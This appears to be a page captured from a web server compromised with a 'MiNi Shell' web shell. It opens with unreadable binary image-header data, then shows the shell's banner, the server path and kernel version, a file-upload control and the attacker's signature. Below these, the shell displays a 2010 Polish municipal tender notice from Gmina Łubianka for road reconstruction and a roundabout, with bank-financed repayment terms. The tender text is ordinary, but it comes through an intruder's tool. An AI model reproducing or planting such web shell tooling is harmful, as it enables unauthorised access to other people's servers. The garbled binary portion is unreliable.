JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100114/11820-N-2010.html

<p class="kh_header"><b>Łubianka: ROZWIĄZANIE POWAŻNYCH PROBLEMÓW KOMUNIKACYJNYCH W PÓŁNOCNO-WSCHODNIEJ CZĘŚCI GMINY ŁUBIANKA POPRZEZ PRZEBUDOWĘ DRÓG GMINNYCH NR 100400 C W MIEJSCOWOŚCIACH WARSZEWICE, BRĄCHNÓWKO I BRĄCHNOWO WRAZ Z BUDOWĄ SKRZYŻOWANIA Z RUCHEM OKRĘŻNYM U ZBIEGU DRÓG: POWIATOWEJ NR 2016 ŁUBIANKA - KOŃCZEWICE (UL. KS.S.FRELICHOWSKIEGO) I GMINNYCH NR 100399 C (UL. KS. INF. GROSZKOWSKIEGO) I 100400C (UL. ZAWISZY CZARNEGO) W MIEJSCOWOŚCI WARSZEWICE WRAZ Z USŁUGĄ WYKUPU WIERZYTELNOŚCI</b><br>
<b>Numer ogłoszenia: 11820 - 2010; data zamieszczenia: 14.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łubianka , Al. Jana Pawła II 8, 87-152 Łubianka, tel. 056 6788217.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROZWIĄZANIE POWAŻNYCH PROBLEMÓW KOMUNIKACYJNYCH W PÓŁNOCNO-WSCHODNIEJ CZĘŚCI GMINY ŁUBIANKA POPRZEZ PRZEBUDOWĘ DRÓG GMINNYCH NR 100400 C W MIEJSCOWOŚCIACH WARSZEWICE, BRĄCHNÓWKO I BRĄCHNOWO WRAZ Z BUDOWĄ SKRZYŻOWANIA Z RUCHEM OKRĘŻNYM U ZBIEGU DRÓG: POWIATOWEJ NR 2016 ŁUBIANKA - KOŃCZEWICE (UL. KS.S.FRELICHOWSKIEGO) I GMINNYCH NR 100399 C (UL. KS. INF. GROSZKOWSKIEGO) I 100400C (UL. ZAWISZY CZARNEGO) W MIEJSCOWOŚCI WARSZEWICE WRAZ Z USŁUGĄ WYKUPU WIERZYTELNOŚCI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przebudowa dróg gminnych i drogi powiatowej na długości  3,15 km i powierzchni nawierzchni 14085 m2 wraz z chodnikiem o powierzchni 1280 m2 zgodnie z niżej podanym przedmiarem robót dla poszczególnych elementów: 
1.1. Droga gminna nr 100400C (ul. Zawiszy Czarnego) Warszewice - Brąchnowo:
- projekt techniczny przebudowy drogi gminnej nr 100400C wraz z opisami i rysunkami,
- specyfikacje techniczne wykonania i odbioru robót budowlanych,
- przedmiar robót
w/w dokumenty w załączeniu do niniejszej SWIZ.
1.2. Skrzyżowanie z ruchem okrężnym u zbiegu dróg: powiatowej nr 2016 Łubianka - Kończewice (ul. Ks. S. Frelichowskiego) i gminnych nr 100399C (ul. Ks. Inf. Groszkowskiego) i 100400C (ul. Zawiszy Czarnego):
-  projekt techniczny budowy skrzyżowania z ruchem okrężnym u zbiegu dróg: powiatowej nr 2016 Łubianka - Kończewice i gminnych nr 100399C i 100400C,
- specyfikacje techniczne wykonania i odbioru robót budowlanych,
- przedmiar robót.
w/w dokumenty w załączeniu do niniejszej SWIZ.
1.3. Skrzyżowanie z ruchem okrężnym u zbiegu dróg: powiatowej nr 2016 Łubianka - Kończewice (ul. Ks. S. Frelichowskiego) i gminnych nr 100399C (ul. Ks. Inf. Groszkowskiego) i 100400C (ul. Zawiszy Czarnego) - odwodnienie:
-  projekt techniczny odwodnienia skrzyżowania z ruchem okrężnym u zbiegu dróg: powiatowej nr 2016 Łubianka - Kończewice i gminnych nr 100399C i 100400C,
- specyfikacje techniczne wykonania i odbioru robót budowlanych,
- przedmiar robót.
w/w dokumenty w załączeniu do niniejszej SWIZ.
1.4. Organizacja ruchu dla dróg gminnych nr 100400C w miejscowościach Warszewice, Brąchnówko i Brąchnowo oraz skrzyżowania z ruchem okrężnym u zbiegu dróg: powiatowej nr 2016 Łubianka - Kończewice (ul. Ks. S. Frelichowskiego) i gminnych nr 100399C (ul. Ks. Inf. Groszkowskiego) i 100400C (ul. Zawiszy Czarnego) w miejscowości Warszewice:
-  organizacja ruchu dla dróg gminnych nr 100400C w miejscowościach Warszewice, Brąchnówko i Brąchnowo oraz skrzyżowania z ruchem okrężnym u zbiegu dróg: powiatowej nr 2016 Łubianka - Kończewice i gminnych nr 100399C i 100400C,
- specyfikacje techniczne,
- przedmiar robót,
w/w dokumenty w załączeniu do niniejszej SWIZ.
2. Do przygotowania kosztorysów ofertowych należy wykorzystać przedmiary robót zamieszczone w pkt 3.1.1 - 3.1.4. zawierające wielkości, które należy wykorzystać przy przygotowaniu kosztorysów ofertowych. 
2.1. Roboty budowlane należy wykonać zgodnie z wytycznymi określonymi w niniejszej specyfikacji (umowie), dokumentacją projektową, specyfikacją techniczną wykonania odbioru robót, obowiązującymi normami, sztuką budowlaną, przepisami BHP oraz p. poż.. Interpretację zapisów należy dokonywać zgodnie z wyżej przedstawioną w kolejnością.
2.2. Do wykonania zamówienia wykonawca zobowiązany jest użyć materiałów gwarantujących odpowiednią jakość, o parametrach technicznych i jakościowych nie gorszych niż określone w niniejszej specyfikacji i dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót. Materiały budowlane muszą spełniać wymogi Polskiej Normy oraz stosownych przepisów szczegółowych odnośnie wyrobów budowlanych.
2.3. Zamawiający uzna zamówienie za wykonane jeżeli przedmiot zamówienia będzie odebrany bez usterek i będzie spełniał warunki jego przeznaczenia.
2.4. Wykonawca będzie odpowiedzialny za oznakowanie i zabezpieczenie terenu na którym prowadzone  będą roboty.
2.5. Wykonawca ubezpieczy teren budowy z tytułu szkód i od odpowiedzialności cywilnej.
2.6. Wykonawca opracuje projekt organizacji ruchu na czas budowy a następnie zabezpieczy, oznakuje teren budowy zgodnie z warunkami wskazanymi w projekcie. 
2.7. Wykonawca zleci opracowanie inwentaryzacji geodezyjnej powykonawczej uwzględniającej wszystkie zrealizowane elementy zadania.
3.  Przedmiotem zamówienia jest również usługa pośrednictwa finansowego polegająca na dokonaniu wykupu wierzytelności jaką będzie wartość wykonanych robót budowlanych wraz z należnym podatkiem VAT.
4.  Wierzytelności wykupione zostaną na następujących warunkach.
4.1. Wykup wierzytelności dokonany zostanie wyłącznie przez Bank.
4.2.  Bank dokona wykupu powstałej wierzytelności w terminie nieprzekraczającym 30 dni od daty odbioru wykonanych robót i złożenia u Zamawiającego faktury za wykonane roboty.
4.3. Spłaty wykupionych wierzytelności dokonywane będą w następujących latach i wielkościach:
- w roku 2010 w wysokości 50% wartości inwestycji zaoferowanej przez Wykonawcę w postępowaniu przetargowym wyliczonej na podstawie kosztorysów ofertowych zawierającej wszystkie elementy opisane w SWIZ powiększonej o kwotę 110.00,00 zł w równych czterech ratach (wrzesień, październik, listopad, grudzień)
- w roku 2011 w wysokości 40.000,00 zł (11 rat x 3.300,00 zł/rata + 1 rata 3.700,00 zł)
- w roku 2012 w wysokości 50.000,00 zł (11 rat x 4.100,00 zł/rata + 1 rata 4.900,00 zł)
- w roku 2013 w wysokości 60.000,00 zł (12 rat x 5.000,00 zł/rata)
- w roku 2014 w wysokości 60.000,00 zł (12 rat x 5.000,00 zł/rata)
- w roku 2015 w wysokości 60.000,00 zł (12 rat x 5.000,00 zł/rata)
- w roku 2016 w wysokości 60.000,00 zł (12 rat x 5.000,00 zł/rata)
- w roku 2017 w wysokości 60.000,00 zł (12 rat x 5.000,00 zł/rata)
- w roku 2018 w wysokości 80.000,00 zł (11 rat x 6.600,00 zł/rata + 1 rata 7.400,00 zł)
- w roku 2019 w wysokości 120.000,00 zł (12 rat x 10.000,00 zł/rata)
- w roku 2020 w wysokości 300.000,00 zł (12 rat x 25.000,00 zł/rata)
- w roku 2021 wysokości 350.000,00 zł (11 rat x 29.000,00 zł + 1 rata 31.000,00 zł) 
4.3.1. Gdy wartość inwestycji określona na podstawie kosztorysów ofertowych przekroczy wartości przewidziane do spłat w ramach wykupu wierzytelności wówczas całą kwotę  ponad kwoty wyżej określone należy dodać do wielkości przewidzianej na rok 2021 i ich sumę rozłożyć ją na 12 równych rat.
4.3.2. Gdy wartość inwestycji określona na podstawie kosztorysów ofertowych nie wypełni wartości przewidzianych do spłat w ramach wykupu wierzytelności wówczas wynikną różnice należy odjąć kolejno od każdej następującej po sobie, przewidzianej do spłat, rat wierzytelności poczynając od 12 raty 2021 r.
4.4.	Spłaty odsetek od wykupionych wierzytelności dokonywane będą w ratach miesięcznych, płatne do ostatniego każdego miesiąca.
4.5.	Odsetki pobierane będą jedynie od niespłaconego kapitału według stawki WIBOR 3M powiększonej o niezmienną marże zaoferowaną w ofercie. 
4.6. Karencja w spłacie kapitału - brak. 
4.7. Zamawiający nie wymaga zastosowania karencji w spłacie odsetek. Odsetki spłacane zostaną od dnia rozliczenia finansowego - końcowego (30.08.2010 r. - termin płatności faktury). Planowany termin odbioru końcowego-rzeczowego inwestycji 30.07.2010 r.
4.8. Wykonawca zobowiązany jest do przedstawienia wielkości oprocentowania jakie  
zostanie zastosowane przy wykupie wierzytelności (sposób ustalenia stopy procentowej: stopa procentowa dla danego okresu odsetkowego będzie ustalana w oparciu o stawkę WIBOR 3M obowiązującą w ostatnim dniu roboczym poprzedniego miesiąca powiększoną o stałą marżę banku) oraz przedstawi płatności wykupu wierzytelności wraz z odsetkami za okres:
od 30.08.2010 r. do 31.12.2021 r. lub w zależności od wartości inwestycji do momentu spłaty wierzytelności. 
4.9. Dla porównywalności ofert oprocentowanie wykupu wierzytelności  - cenę,  ustalić w oparciu o WIBOR 3M obowiązujący w dniu 15.01.2010 r. powiększony o marżę banku o stałą marżę banku.
4.10. Wartość wszystkich prowizji od zawartej umowy w części dotyczącej wykupu wierzytelności wyniesie 0%.
4.11.  Bank nie może żądać od Zamawiającego spłaty zobowiązania przed umówionym okresem spłaty. Spłaty dokonywane będą tylko według ustalonego harmonogramu spłat.
4.12. Wykonawca lub Bank finansujący Wykonawcę nie może bez zgody Zamawiającego przekazać wierzytelności osobie trzeciej. 
4.13. Zamawiający zastrzega sobie możliwość wcześniejszej spłaty części lub całości zadłużenia przed terminem ostatecznej spłaty w takim przypadku odsetki będą naliczone od faktycznego stanu zadłużenia w dniu spłaty.
4.14. Naliczane odsetki i kapitał spłacane będą zgodnie z harmonogramem spłaty na ostatni dzień każdego miesiąca. 
4.15 Pomiędzy Wykonawcą, Bankiem i Zamawiającym zawarta zostanie umowa trójstronna regulująca kwestie wykupu wierzytelności w związku z realizacją inwestycji modernizacji dróg gminnych.
4.16. Dla oceny finansowej-ekonomicznej Gminy na pisemne żądanie oferenta przekazane zostaną niezbędne dokumenty pozwalające określić sytuację finansowo-ekonomiczną Gminy Łubianka..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 66.20.00.00-2, 45.10.00.00-8, 45.11.13.00-1, 45.11.20.00-5, 45.11.12.20-6, 45.23.30.00-9, 45.23.33.20-8, 45.23.32.20-7, 45.23.32.22-1, 45.23.32.22-1, 45.11.27.10-5, 45.23.13.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2021.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wykonawca winien wnieść wadium w kwocie 50.000,00 zł (słownie: pięćdziesiąt tysięcy złotych) do dnia 19.02.2010 r. do godz.  9:45.
2. W zależności od woli Wykonawcy, wadium może być wniesione w: 2.1. pieniądzu na konto Zamawiającego: 60951100002003002149020001 (za datę wniesienia wadium w pieniądzu liczy się datę wpływu pieniędzy na konto Zamawiającego),
2.2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym.
2.3. gwarancjach bankowych,
2.4. gwarancjach ubezpieczeniowych,
2.5. poręczeniach udzielanych oraz podmioty o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości,
2.6. pieniądzu w kasie Zamawiającego 
3. Zamawiający dokona zwrotu wadium: 3.1. niezwłocznie po  upływie terminu związania ofertą,
3.2. niezwłocznie po zawarciu umowy i wniesieniu przez Wykonawcę wymaganego zabezpieczenia należytego wykonania umowy,
3.3. niezwłocznie po unieważnieniu przetargu, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
4. Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy:
4.1. który wycofał ofertę przed upływem terminu składnia ofert,
4.2. który został wykluczony z postępowania,
4.3. którego oferta została dorzucona.
5. Oferent, którego oferta zostanie wybrana utraci wadium na rzecz Zamawiającego, jeżeli:
5.1. odmówi podpisania umowy na warunkach określonych w ofercie,
5.2. odmówi wniesienia zabezpieczenia należytego wykonania umowy,
5.3. zawarcie umowy stanie się niemożliwe z winy Wykonawcy,
5.4. Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
6. Wykonawca, który nie w niesie wadium lub nie zabezpieczy oferty akceptowalna formą wadium w wyznaczonym terminie zostanie wykluczony z postępowania a jego oferta zostanie odrzucona.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wykonawca musi posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2. Wykonawca musi posiadać niezbędną wiedzę i doświadczenie oraz potępiał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia.
3. Wykonawca musi znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.  
4. Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 

Zamawiający wykluczy z postępowania Wykonawców, którzy nie złożyli wymaganych oświadczeń i dokumentów lub nie spełnili innych wymagań określonych w ustawie specyfikacji istotnych warunków zamówienia lub w ogłoszeniu.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca musi dołączyć do oferty następujące dokumenty i oświadczenia:
1.1. oświadczenie na załączniku nr 1 do oferty wg wzoru załączonego do wzoru  
            formularza oferty, że Wykonawca nie podlega wykluczeniu z postępowania na 
            podstawie art. 24 ust. 1 i spełnia warunki określone w art. 22 ust. 1 Prawa zamówień   
            publicznych - oświadczenie skład zarówno Wykonawca robót budowlanych jak i    
            Bank podejmujący się wykupu wierzytelności,

1.2. aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do 
            rejestru w celu wykazania braku podstaw do wykluczenie w oparciu o art. 24 ust. 1 pkt 
            2 ustawy wystawionego nie wcześniej niż 6 miesięcy przed upływem do terminu 
            składania ofert.

1.3. kosztorysy ofertowe szczegółowe dla poszczególnych elementów z podaniem cen   
            jednostkowych.

1.4. wykaz wykonanych robót budowlanych wykonanych w okresie ostatnich 5 lat z przed 
            upływem terminu składania ofert z podaniem ich rodzaju i wartości, daty i miejsca 
            wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały 
            wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

1.5. harmonogram realizacji zadania.

1.6. harmonogram spłat odsetek i kapitału za wykonane roboty (opracowany według zasad  
            w pkt. 3 SWIZ) z podaniem wartości odsetek za cały okres finansowania.

1.7. oświadczenie na temat wielkości średniego rocznego zatrudnienie u wykonawcy robót 
            budowlany oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat 
            przed upływem terminu składania ofert.

1.8. wykaz osób, którzy będą uczestniczyli w wykonaniu zamówienia, w szczególności 
            odpowiedzialnych za kontrolę jakości lub kierowanie robotami wraz z informacjami 
            na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego 
            do wykonania zamówienia, także zakresu wykonywanych przez nie czynności, oraz 
            informacją o podstawie do dysponowania tymi osobami.

1.9. oświadczenie, że osoby które będą uczestniczyć w wykonaniu zamówienia posiadają 
            wymagane uprawnienia, jeśli ustawy nakładają obowiązek posiadania takich 
            uprawnień

1.10. wykaz narzędzi i wyposażenia zakładu i urządzeń technicznych dostępnych 
            wykonawcy robót budowlanych w celu realizacji zamówienia wraz z informacją o 
            podstawie dysponowania tymi zasobami

1.11. zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału  
              zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia społecznego 
              potwierdzających odpowiednio, że wykonawca nie zalega z opłaceniem podatków, 
              opłat oraz składek na Ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że 
              uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty 
              zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego 
              organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania  
              ofert.

1.12. sprawozdanie finansowe albo jego część, jeżeli podlega ono badaniu przez biegłego 
              rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o   
              badanym sprawozdaniu albo jego częścią, a w przypadku wykonawców  
              niezobowiązanych do sporządzenia sprawozdania finansowego innych dokumentów  
              określających obroty oraz zobowiązania i należności za ostatnie trzy lata obrotowe, a   
              jeżeli okres prowadzenia działalności jest krótszy za ten okres.

1.13. informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których 
              Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków 
              finansowych lub zdolność kredytową Wykonawcy, wystawionej nie wcześniej niż 3 
              miesiące przed upływem terminu składania ofert. 

1.14. umowę spółki cywilnej, jeżeli działalność gospodarcza przedsiębiorców prowadzona  
              jest w formie spółki cywilnej.

1.15. kserokopię dowodu wniesienia wadium.

1.16. opłaconą polisę lub inny dokument potwierdzający, że Wykonawca jest    
              ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.

1.17. dokument potwierdzający prawo wykupu wierzytelności tj. promesa Banku lub 
              umowa pomiędzy Bankiem i Wykonawcą świadczące o wykupie wierzytelności  
              przez ten  Bank. Przedstawiany dokument musi jednoznacznie wskazywana  
              zobowiązanie banku do wykupu wierzytelności objętych niniejszym zamówieniem w  
              przedmiocie modernizacji dróg gminnych.

1.18. wzór umowy trójstronnej przygotowany przez Bank w sprawie wykupu 
              wierzytelności z uwzględnieniem warunków przedstawionych w rozdziale VI - 
              istotne postanowienia umowy w części dotyczącej wykupu wierzytelności. 
 
2. W przypadku, gdy Wykonawca w miejsce któregoś z dokumentów, o których mowa w pkt. 15.1.1. - 15.1.16.  niniejszej specyfikacji dostarczy jego kopię, kopia ta powinna być poświadczona za zgodność z oryginałem przez Wykonawcę. Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów np. jeśli przedstawione kserokopie będą nieczytelne lub będą wzbudzać wątpliwości co do ich prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lubianka.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Łubiance, Aleja Jana Pawła II nr 8, 87-152 Łubianka.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2010 godzina 10:00, miejsce: Urząd Gminy w Łubiance - sekretariat,
Aleja Jana Pawła II nr 8, 87-152 Łubianka.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com